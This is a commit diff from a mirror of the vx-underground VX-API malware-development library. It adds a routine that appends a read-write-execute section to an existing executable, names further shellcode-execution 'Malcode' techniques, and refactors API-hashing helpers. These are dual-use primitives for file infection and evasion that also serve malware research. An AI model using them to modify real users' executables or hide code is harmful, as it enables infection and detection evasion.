Mirrors
/
vxug-VXAPI
mirror of https://github.com/vxunderground/VX-API
6
0
Fork 0
Code Issues Projects Releases Wiki Activity

2.0.607 

2.0.607
This commit is contained in:
vxunderground 2022-12-27 11:19:00 -06:00
parent c91d3da65e
commit e56f07d798
48 changed files with 979 additions and 117 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
README.md
View File

@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
# VX-API
Version: 2.0.559
Version: 2.0.607
Developer: smelly__vx
@ -129,6 +129,9 @@ You're free to use this in any manner you please. You do not need to use this en
| GetCurrentProcessIdFromOffset | RistBS | Helper Functions |
| GetPeBaseAddress | smelly__vx | Helper Functions |
| LdrLoadGetProcedureAddress | c5pider | Helper Functions |
| IsPeSection | smelly__vx | Helper Functions |
| AddSectionToPeFile | smelly__vx | Helper Functions |
| WriteDataToPeSection | smelly__vx | Helper Functions |
| GetKUserSharedData | Geoff Chappell | Library Loading |
| GetModuleHandleEx2 | smelly__vx | Library Loading |
| GetPeb | 29a | Library Loading |
@ -191,6 +194,16 @@ You're free to use this in any manner you please. You do not need to use this en
| MpfPiQueueUserAPCViaAtomBomb | SafeBreach Labs | Malcode |
| MpfPiWriteProcessMemoryCreateRemoteThread | SafeBreach Labs | Malcode |
| MpfProcessInjectionViaProcessReflection | Deep Instinct | Malcode |
| MpfSceViaImmEnumInputContext | alfarom256, aahmad097 | Malcode |
| MpfSceViaCertFindChainInStore | alfarom256, aahmad097 | Malcode |
| MpfSceViaEnumPropsExW | alfarom256, aahmad097 | Malcode |
| MpfSceViaCreateThreadpoolWait | alfarom256, aahmad097 | Malcode |
| MpfSceViaCryptEnumOIDInfo | alfarom256, aahmad097 | Malcode |
| MpfSceViaDSA_EnumCallback | alfarom256, aahmad097 | Malcode |
| MpfSceViaCreateTimerQueueTimer | alfarom256, aahmad097 | Malcode |
| MpfSceViaEvtSubscribe | alfarom256, aahmad097 | Malcode |
| MpfSceViaFlsAlloc | alfarom256, aahmad097 | Malcode |
| MpfSceViaInitOnceExecuteOnce | alfarom256, aahmad097 | Malcode |
| UrlDownloadToFileSynchronous | Hans Passant | Networking |
| ConvertIPv4IpAddressStructureToString | smelly__vx | Networking |
| ConvertIPv4StringToUnsignedLong | smelly__vx | Networking |

186
VX-API/AddSectionToPeFile.cpp Normal file
View File

@ -0,0 +1,186 @@
#include "Win32Helper.h"
DWORD AlignSection(_In_ DWORD Size, _In_ DWORD Align, _In_ DWORD Address)
{
if (!(Size % Align))
return Address + Size;
return Address + (Size / Align + 1) * Align;
}
BOOL AddSectionToPeFileW(_In_ LPCWSTR Path, _In_ LPCSTR SectionName, _In_ DWORD SectionSizeInBytes)
{
BOOL bFlag = FALSE;
HANDLE hHandle = INVALID_HANDLE_VALUE;
LONGLONG SizeOfTargetBinary = 0L;
PBYTE FileBuffer = NULL;
PIMAGE_DOS_HEADER Dos = NULL;
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
PIMAGE_SECTION_HEADER Section = NULL;
WORD Offset = ERROR_SUCCESS;
DWORD SectionCharacteristics = ERROR_SUCCESS;
WCHAR DisposeableObject[32] = { 0 };
if (CharStringToWCharString(DisposeableObject, (PCHAR)SectionName, StringLengthA(SectionName)) == 0)
goto EXIT_ROUTINE;
if(IsPeSectionW(Path, DisposeableObject))
return TRUE;
SizeOfTargetBinary = GetFileSizeFromPathW((PWCHAR)Path, FILE_ATTRIBUTE_NORMAL);
if (SizeOfTargetBinary == INVALID_FILE_SIZE)
goto EXIT_ROUTINE;
hHandle = CreateFileW(Path, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hHandle == INVALID_HANDLE_VALUE)
goto EXIT_ROUTINE;
FileBuffer = (PBYTE)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, SizeOfTargetBinary);
if (FileBuffer == NULL)
goto EXIT_ROUTINE;
if (!ReadFile(hHandle, FileBuffer, (DWORD)SizeOfTargetBinary, NULL, NULL))
goto EXIT_ROUTINE;
if (!RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &FileBuffer))
goto EXIT_ROUTINE;
Section = (PIMAGE_SECTION_HEADER)(FileBuffer + Dos->e_lfanew + sizeof(IMAGE_NT_HEADERS));
Offset = File->NumberOfSections;
RtlZeroMemory(&Section[Offset], sizeof(IMAGE_SECTION_HEADER));
RtlCopyMemory(&Section[Offset].Name, SectionName, StringLengthA(SectionName));
Section[Offset].Misc.VirtualSize = AlignSection(SectionSizeInBytes, Optional->SectionAlignment, 0);
Section[Offset].VirtualAddress = AlignSection(Section[Offset - 1].Misc.VirtualSize, Optional->SectionAlignment, Section[Offset - 1].VirtualAddress);
Section[Offset].SizeOfRawData = AlignSection(SectionSizeInBytes, Optional->FileAlignment, 0);
Section[Offset].PointerToRawData = AlignSection(Section[Offset - 1].SizeOfRawData, Optional->FileAlignment, Section[Offset - 1].PointerToRawData);
SectionCharacteristics = IMAGE_SCN_MEM_WRITE |
IMAGE_SCN_CNT_CODE |
IMAGE_SCN_CNT_UNINITIALIZED_DATA |
IMAGE_SCN_MEM_EXECUTE |
IMAGE_SCN_CNT_INITIALIZED_DATA |
IMAGE_SCN_MEM_READ;
Section[Offset].Characteristics = SectionCharacteristics;
if (SetFilePointer(hHandle, Section[Offset].PointerToRawData + Section[Offset].SizeOfRawData, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER)
goto EXIT_ROUTINE;
if (!SetEndOfFile(hHandle))
goto EXIT_ROUTINE;
Optional->SizeOfImage = Section[Offset].VirtualAddress + Section[Offset].Misc.VirtualSize;
File->NumberOfSections += 1;
if (SetFilePointer(hHandle, 0, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER)
goto EXIT_ROUTINE;
if (!WriteFile(hHandle, FileBuffer, (DWORD)SizeOfTargetBinary, NULL, NULL))
goto EXIT_ROUTINE;
bFlag = TRUE;
EXIT_ROUTINE:
if (FileBuffer)
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, FileBuffer);
if (hHandle)
CloseHandle(hHandle);
return bFlag;
}
BOOL AddSectionToPeFileA(_In_ LPCSTR Path, _In_ LPCSTR SectionName, _In_ DWORD SectionSizeInBytes)
{
BOOL bFlag = FALSE;
HANDLE hHandle = INVALID_HANDLE_VALUE;
LONGLONG SizeOfTargetBinary = 0L;
PBYTE FileBuffer = NULL;
PIMAGE_DOS_HEADER Dos = NULL;
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
PIMAGE_SECTION_HEADER Section = NULL;
WORD Offset = ERROR_SUCCESS;
DWORD SectionCharacteristics = ERROR_SUCCESS;
if (IsPeSectionA(Path, SectionName))
return TRUE;
SizeOfTargetBinary = GetFileSizeFromPathA((PCHAR)Path, FILE_ATTRIBUTE_NORMAL);
if (SizeOfTargetBinary == INVALID_FILE_SIZE)
goto EXIT_ROUTINE;
hHandle = CreateFileA(Path, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hHandle == INVALID_HANDLE_VALUE)
goto EXIT_ROUTINE;
FileBuffer = (PBYTE)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, SizeOfTargetBinary);
if (FileBuffer == NULL)
goto EXIT_ROUTINE;
if (!ReadFile(hHandle, FileBuffer, (DWORD)SizeOfTargetBinary, NULL, NULL))
goto EXIT_ROUTINE;
if (!RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &FileBuffer))
goto EXIT_ROUTINE;
Section = (PIMAGE_SECTION_HEADER)(FileBuffer + Dos->e_lfanew + sizeof(IMAGE_NT_HEADERS));
Offset = File->NumberOfSections;
RtlZeroMemory(&Section[Offset], sizeof(IMAGE_SECTION_HEADER));
RtlCopyMemory(&Section[Offset].Name, SectionName, StringLengthA(SectionName));
Section[Offset].Misc.VirtualSize = AlignSection(SectionSizeInBytes, Optional->SectionAlignment, 0);
Section[Offset].VirtualAddress = AlignSection(Section[Offset - 1].Misc.VirtualSize, Optional->SectionAlignment, Section[Offset - 1].VirtualAddress);
Section[Offset].SizeOfRawData = AlignSection(SectionSizeInBytes, Optional->FileAlignment, 0);
Section[Offset].PointerToRawData = AlignSection(Section[Offset - 1].SizeOfRawData, Optional->FileAlignment, Section[Offset - 1].PointerToRawData);
SectionCharacteristics = IMAGE_SCN_MEM_WRITE |
IMAGE_SCN_CNT_CODE |
IMAGE_SCN_CNT_UNINITIALIZED_DATA |
IMAGE_SCN_MEM_EXECUTE |
IMAGE_SCN_CNT_INITIALIZED_DATA |
IMAGE_SCN_MEM_READ;
Section[Offset].Characteristics = SectionCharacteristics;
if (SetFilePointer(hHandle, Section[Offset].PointerToRawData + Section[Offset].SizeOfRawData, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER)
goto EXIT_ROUTINE;
if (!SetEndOfFile(hHandle))
goto EXIT_ROUTINE;
Optional->SizeOfImage = Section[Offset].VirtualAddress + Section[Offset].Misc.VirtualSize;
File->NumberOfSections += 1;
if (SetFilePointer(hHandle, 0, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER)
goto EXIT_ROUTINE;
if (!WriteFile(hHandle, FileBuffer, (DWORD)SizeOfTargetBinary, NULL, NULL))
goto EXIT_ROUTINE;
bFlag = TRUE;
EXIT_ROUTINE:
if (FileBuffer)
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, FileBuffer);
if (hHandle)
CloseHandle(hHandle);
return bFlag;
}

4
VX-API/CreateLocalAppDataObjectPath.cpp
View File

@ -1,6 +1,6 @@
#include "Win32Helper.h"
BOOL CreateLocalAppDataObjectPathW(_Inout_ PWCHAR pBuffer, _In_ PWCHAR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist)
BOOL CreateLocalAppDataObjectPathW(_Inout_ PWCHAR pBuffer, _In_ LPCWSTR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist)
{
if (pBuffer == NULL)
return FALSE;
@ -20,7 +20,7 @@ BOOL CreateLocalAppDataObjectPathW(_Inout_ PWCHAR pBuffer, _In_ PWCHAR Path, _In
return TRUE;
}
BOOL CreateLocalAppDataObjectPathA(_Inout_ PCHAR pBuffer, _In_ PCHAR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist)
BOOL CreateLocalAppDataObjectPathA(_Inout_ PCHAR pBuffer, _In_ LPCSTR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist)
{
if (pBuffer == NULL)
return FALSE;

4
VX-API/CreateMd5HashFromFilePath.cpp
View File

@ -1,7 +1,7 @@
#include "Win32Helper.h"
#include <Wincrypt.h>
BOOL CreateMd5HashFromFilePathW(_In_ PWCHAR FilePath, _Inout_ PWCHAR Md5Hash)
BOOL CreateMd5HashFromFilePathW(_In_ LPCWSTR FilePath, _Inout_ PWCHAR Md5Hash)
{
HANDLE hHandle = INVALID_HANDLE_VALUE;
HCRYPTPROV hProvider = NULL;
@ -65,7 +65,7 @@ EXIT_ROUTINE:
return bFlag;
}
BOOL CreateMd5HashFromFilePathA(_In_ PCHAR FilePath, _Inout_ PCHAR Md5Hash)
BOOL CreateMd5HashFromFilePathA(_In_ LPCSTR FilePath, _Inout_ PCHAR Md5Hash)
{
HANDLE hHandle = INVALID_HANDLE_VALUE;
HCRYPTPROV hProvider = NULL;

4
VX-API/GetProcAddress.cpp
View File

@ -31,7 +31,7 @@ DWORD64 __stdcall GetProcAddressA(_In_ DWORD64 ModuleBase, _In_ LPCSTR lpProcNam
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
@ -80,7 +80,7 @@ DWORD64 __stdcall GetProcAddressW(_In_ DWORD64 ModuleBase, _In_ LPCWSTR lpProcNa
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)

2
VX-API/GetProcAddressDjb2.cpp
View File

@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressDjb2(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash)
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)

2
VX-API/GetProcAddressFowlerNollVoVariant1a.cpp
View File

@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressFowlerNollVoVariant1a(_In_ DWORD64 ModuleBase, _
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)

2
VX-API/GetProcAddressJenkinsOneAtATime32Bit.cpp
View File

@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressJenkinsOneAtATime32Bit(_In_ DWORD64 ModuleBase,
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)

2
VX-API/GetProcAddressLoseLose.cpp
View File

@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressLoseLose(_In_ DWORD64 ModuleBase, _In_ DWORD64 H
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)

2
VX-API/GetProcAddressMurmur.cpp
View File

@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressMurmur(_In_ DWORD64 ModuleBase, _In_ DWORD64 Has
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)

2
VX-API/GetProcAddressRotr32.cpp
View File

@ -33,7 +33,7 @@ DWORD64 __stdcall GetProcAddressRotr32(_In_ DWORD64 ModuleBase, _In_ DWORD64 Has
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)

2
VX-API/GetProcAddressSdbm.cpp
View File

@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressSdbm(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash)
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)

2
VX-API/GetProcAddressSipHash.cpp
View File

@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressSipHash(_In_ DWORD64 ModuleBase, _In_ DWORD64 Ha
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)

2
VX-API/GetProcAddressSuperFastHash.cpp
View File

@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressSuperFastHash(_In_ DWORD64 ModuleBase, _In_ DWOR
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)

2
VX-API/GetProcAddressUnknownGenericHash1.cpp
View File

@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressUnknownGenericHash1(_In_ DWORD64 ModuleBase, _In
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)

4
VX-API/HashFileByMsiFileHashTable.cpp
View File

@ -1,7 +1,7 @@
#include "Win32Helper.h"
//NOTE: PULONG must be pointed to an array of ULONG integers e.g. ULONG FileHash[4] = { 0 };
BOOL HashFileByMsiFileHashTableW(_In_ PWCHAR Path, _Inout_ PULONG FileHash)
BOOL HashFileByMsiFileHashTableW(_In_ LPCWSTR Path, _Inout_ PULONG FileHash)
{
MSIGETFILEHASHW MsiGetFileHashW = NULL;
MSIFILEHASHINFO Hash = { 0 };
@ -40,7 +40,7 @@ EXIT_ROUTINE:
return bFlag;
}
BOOL HashFileByMsiFileHashTableA(_In_ PCHAR Path, _Inout_ PULONG FileHash)
BOOL HashFileByMsiFileHashTableA(_In_ LPCSTR Path, _Inout_ PULONG FileHash)
{
MSIGETFILEHASHA MsiGetFileHashA = NULL;
MSIFILEHASHINFO Hash = { 0 };

4
VX-API/HashStringDjb2.cpp
View File

@ -1,6 +1,6 @@
#include "Win32Helper.h"
DWORD HashStringDjb2A(_In_ PCHAR String)
DWORD HashStringDjb2A(_In_ LPCSTR String)
{
ULONG Hash = 5381;
INT c = 0;
@ -11,7 +11,7 @@ DWORD HashStringDjb2A(_In_ PCHAR String)
return Hash;
}
DWORD HashStringDjb2W(_In_ PWCHAR String)
DWORD HashStringDjb2W(_In_ LPCWSTR String)
{
ULONG Hash = 5381;
INT c = 0;

4
VX-API/HashStringFowlerNollVoVariant1a.cpp
View File

@ -1,6 +1,6 @@
#include "Win32Helper.h"
ULONG HashStringFowlerNollVoVariant1aA(_In_ PCHAR String)
ULONG HashStringFowlerNollVoVariant1aA(_In_ LPCSTR String)
{
ULONG Hash = 0x811c9dc5;
@ -13,7 +13,7 @@ ULONG HashStringFowlerNollVoVariant1aA(_In_ PCHAR String)
return Hash;
}
ULONG HashStringFowlerNollVoVariant1aW(_In_ PWCHAR String)
ULONG HashStringFowlerNollVoVariant1aW(_In_ LPCWSTR String)
{
ULONG Hash = 0x811c9dc5;

4
VX-API/HashStringJenkinsOneAtATime32Bit.cpp
View File

@ -1,6 +1,6 @@
#include "Win32Helper.h"
UINT32 HashStringJenkinsOneAtATime32BitA(_In_ PCHAR String)
UINT32 HashStringJenkinsOneAtATime32BitA(_In_ LPCSTR String)
{
SIZE_T Index = 0;
UINT32 Hash = 0;
@ -20,7 +20,7 @@ UINT32 HashStringJenkinsOneAtATime32BitA(_In_ PCHAR String)
return Hash;
}
UINT32 HashStringJenkinsOneAtATime32BitW(_In_ PWCHAR String)
UINT32 HashStringJenkinsOneAtATime32BitW(_In_ LPCWSTR String)
{
SIZE_T Index = 0;
UINT32 Hash = 0;

4
VX-API/HashStringLoseLose.cpp
View File

@ -1,6 +1,6 @@
#include "Win32Helper.h"
DWORD HashStringLoseLoseA(_In_ PCHAR String)
DWORD HashStringLoseLoseA(_In_ LPCSTR String)
{
ULONG Hash = 0;
INT c;
@ -11,7 +11,7 @@ DWORD HashStringLoseLoseA(_In_ PCHAR String)
return Hash;
}
DWORD HashStringLoseLoseW(_In_ PWCHAR String)
DWORD HashStringLoseLoseW(_In_ LPCWSTR String)
{
ULONG Hash = 0;
INT c;

4
VX-API/HashStringMurmur.cpp
View File

@ -1,6 +1,6 @@
#include "Win32Helper.h"
INT32 HashStringMurmurW(_In_ PWCHAR String)
INT32 HashStringMurmurW(_In_ LPCWSTR String)
{
INT Length = (INT)StringLengthW(String);
UINT32 hash = 0;
@ -57,7 +57,7 @@ INT32 HashStringMurmurW(_In_ PWCHAR String)
return hash;
}
INT32 HashStringMurmurA(_In_ PCHAR String)
INT32 HashStringMurmurA(_In_ LPCSTR String)
{
INT Length = (INT)StringLengthA(String);
UINT32 hash = 0;

4
VX-API/HashStringRotr32.cpp
View File

@ -10,7 +10,7 @@ UINT32 HashStringRotr32SubA(UINT32 Value, UINT Count)
#pragma warning( pop )
}
INT HashStringRotr32A(_In_ PCHAR String)
INT HashStringRotr32A(_In_ LPCSTR String)
{
INT Value = 0;
@ -30,7 +30,7 @@ UINT32 HashStringRotr32SubW(UINT32 Value, UINT Count)
#pragma warning( pop )
}
INT HashStringRotr32W(_In_ PWCHAR String)
INT HashStringRotr32W(_In_ LPCWSTR String)
{
INT Value = 0;

4
VX-API/HashStringSdbm.cpp
View File

@ -1,6 +1,6 @@
#include "Win32Helper.h"
DWORD HashStringSdbmA(_In_ PCHAR String)
DWORD HashStringSdbmA(_In_ LPCSTR String)
{
ULONG Hash = 0;
INT c;
@ -11,7 +11,7 @@ DWORD HashStringSdbmA(_In_ PCHAR String)
return Hash;
}
DWORD HashStringSdbmW(_In_ PWCHAR String)
DWORD HashStringSdbmW(_In_ LPCWSTR String)
{
ULONG Hash = 0;
INT c;

8
VX-API/HashStringSipHash.cpp
View File

@ -21,11 +21,11 @@
} while (0)
INT32 HashStringSipHashW(_In_ PWCHAR String)
INT32 HashStringSipHashW(_In_ LPCWSTR String)
{
INT Length = (INT)StringLengthW(String);
UINT64 hash = ((UINT64)Length) << 56;
PWCHAR end = String + Length - (Length % sizeof(UINT64));
PWCHAR end = (PWCHAR)String + Length - (Length % sizeof(UINT64));
INT left = Length & 7;
@ -93,11 +93,11 @@ INT32 HashStringSipHashW(_In_ PWCHAR String)
}
INT32 HashStringSipHashA(_In_ PCHAR String)
INT32 HashStringSipHashA(_In_ LPCSTR String)
{
INT Length = (INT)StringLengthA(String);
UINT64 hash = ((UINT64)Length) << 56;
PCHAR end = String + Length - (Length % sizeof(UINT64));
PCHAR end = (PCHAR)String + Length - (Length % sizeof(UINT64));
INT left = Length & 7;
UINT64 m;

4
VX-API/HashStringSuperFastHash.cpp
View File

@ -1,6 +1,6 @@
#include "Win32Helper.h"
UINT32 HashStringSuperFastHashA(_In_ PCHAR String)
UINT32 HashStringSuperFastHashA(_In_ LPCSTR String)
{
INT Length = (INT)StringLengthA(String);
UINT32 Hash = Length;
@ -56,7 +56,7 @@ UINT32 HashStringSuperFastHashA(_In_ PCHAR String)
return Hash;
}
UINT32 HashStringSuperFastHashW(_In_ PWCHAR String)
UINT32 HashStringSuperFastHashW(_In_ LPCWSTR String)
{
INT Length = (INT)StringLengthW(String);
UINT32 Hash = Length;

8
VX-API/HashStringUnknownGenericHash1.cpp
View File

@ -1,12 +1,12 @@
#include "Win32Helper.h"
INT HashStringUnknownGenericHash1A(_In_ PCHAR String)
INT HashStringUnknownGenericHash1A(_In_ LPCSTR String)
{
PCHAR Pointer;
INT Generic;
INT Hash = 0;
for (Pointer = String; *Pointer != '\0'; Pointer++)
for (Pointer = (PCHAR)String; *Pointer != '\0'; Pointer++)
{
Hash = (Hash << 4) + (INT)(*Pointer);
Generic = Hash & 0xF0000000L;
@ -20,13 +20,13 @@ INT HashStringUnknownGenericHash1A(_In_ PCHAR String)
return Hash;
}
INT HashStringUnknownGenericHash1W(_In_ PWCHAR String)
INT HashStringUnknownGenericHash1W(_In_ LPCWSTR String)
{
PWCHAR Pointer;
INT Generic;
INT Hash = 0;
for (Pointer = String; *Pointer != '\0'; Pointer++)
for (Pointer = (PWCHAR)String; *Pointer != '\0'; Pointer++)
{
Hash = (Hash << 4) + (INT)(*Pointer);
Generic = Hash & 0xF0000000L;

4
VX-API/IsPathValid.cpp
View File

@ -1,6 +1,6 @@
#include "Win32Helper.h"
BOOL IsPathValidA(_In_ PCHAR FilePath)
BOOL IsPathValidA(_In_ LPCSTR FilePath)
{
HANDLE hFile = INVALID_HANDLE_VALUE;
@ -14,7 +14,7 @@ BOOL IsPathValidA(_In_ PCHAR FilePath)
return TRUE;
}
BOOL IsPathValidW(_In_ PWCHAR FilePath)
BOOL IsPathValidW(_In_ LPCWSTR FilePath)
{
HANDLE hFile = INVALID_HANDLE_VALUE;

108
VX-API/IsPeSection.cpp Normal file
View File

@ -0,0 +1,108 @@
#include "Win32Helper.h"
BOOL IsPeSectionW(_In_ LPCWSTR PathToBinary, _In_ LPCWSTR PeSectionName)
{
BOOL bFlag = FALSE;
HANDLE hHandle = INVALID_HANDLE_VALUE;
PBYTE Buffer = NULL;
LONGLONG SizeOfTargetBinary = 0L;
PIMAGE_DOS_HEADER Dos = NULL;
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
PIMAGE_SECTION_HEADER Section = NULL;
PIMAGE_SECTION_HEADER SectionHeaderArray = NULL;
CHAR SectionName[32] = { 0 };
if (WCharStringToCharString(SectionName, (PWCHAR)PeSectionName, StringLengthW(PeSectionName)) == 0)
goto EXIT_ROUTINE;
SizeOfTargetBinary = GetFileSizeFromPathW((PWCHAR)PathToBinary, FILE_ATTRIBUTE_NORMAL);
if (SizeOfTargetBinary == INVALID_FILE_SIZE)
goto EXIT_ROUTINE;
hHandle = CreateFileW(PathToBinary, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hHandle == INVALID_HANDLE_VALUE)
goto EXIT_ROUTINE;
Buffer = (PBYTE)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, SizeOfTargetBinary);
if (Buffer == NULL)
goto EXIT_ROUTINE;
if (!ReadFile(hHandle, Buffer, SizeOfTargetBinary, NULL, NULL))
goto EXIT_ROUTINE;
